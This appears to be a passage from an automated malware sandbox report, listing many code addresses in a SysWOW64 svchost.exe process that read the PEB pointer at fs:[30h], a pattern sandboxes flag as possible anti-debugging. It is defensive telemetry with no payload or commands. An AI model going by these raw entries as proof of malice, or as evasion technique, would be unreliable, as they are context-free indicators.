            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]2_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]2_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]2_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]2_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]2_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]2_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]2_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]2_2_038280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]2_2_038C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]2_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]2_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]2_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]2_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]2_2_038B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]2_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]2_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]2_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]2_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]2_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]2_2_038C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]2_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]2_2_038B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]2_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]2_2_038D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]2_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]2_2_038E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]2_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]2_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]2_2_038BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]2_2_0386C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]2_2_03830710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]2_2_03860710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]2_2_038AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]2_2_03830750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]2_2_038BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]2_2_038B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]2_2_03838770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]2_2_0386C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]2_2_038666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]2_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]2_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]2_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]2_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]2_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]2_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]2_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]2_2_0384C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]2_2_03862674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]2_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]2_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]2_2_03864588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]2_2_0386E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]2_2_038365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]2_2_038325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]2_2_038C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]2_2_038EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]2_2_038364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]2_2_038644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]2_2_038BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]2_2_038304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]2_2_0382C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]2_2_0386A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]2_2_038EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]2_2_0382645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]2_2_0385245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]2_2_038BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]2_2_038DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]2_2_0385EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]2_2_038BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]2_2_03904B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
